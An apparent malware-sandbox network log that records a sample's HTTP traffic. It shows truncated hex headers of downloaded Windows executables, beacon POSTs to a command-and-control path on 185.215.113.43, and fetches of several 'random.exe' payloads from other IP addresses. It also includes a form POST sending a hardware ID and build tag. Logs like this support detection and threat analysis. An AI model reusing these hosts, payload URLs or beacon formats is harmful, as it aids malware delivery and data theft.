00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:46:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 17:47:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:47:00 GMTContent-Type: application/octet-streamContent-Length: 2095616Last-Modified: Tue, 05 Nov 2024 16:58:03 GMTConnection: keep-aliveETag: "672a4e9b-1ffa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 77 64 6b 70 7a 67 78 00 50 19 00 00 f0 57 00 00 4a 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 75 61 75 76 6e 63 69 00 10 00 00 00 40 71 00 00 04 00 00 00 d4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 71 00 00 22 00 00 00 d8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 05 Nov 2024 17:47:04 GMTContent-Type: application/octet-streamContent-Length: 3235328Last-Modified: Tue, 05 Nov 2024 16:58:11 GMTConnection: keep-aliveETag: "672a4ea3-315e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 70 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 31 00 00 04 00 00 05 9d 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 50 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 4f 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 77 7a 6a 78 76 68 76 00 b0 2a 00 00 b0 06 00 00 a2 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6d 62 79 6b 6c 64 6b 00 10 00 00 00 60 31 00 00 06 00 00 00 36 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 31 00 00 22 00 00 00 3c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/freecam.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 31 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004149001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004154001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 31 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004155001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 35 41 31 31 32 44 45 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 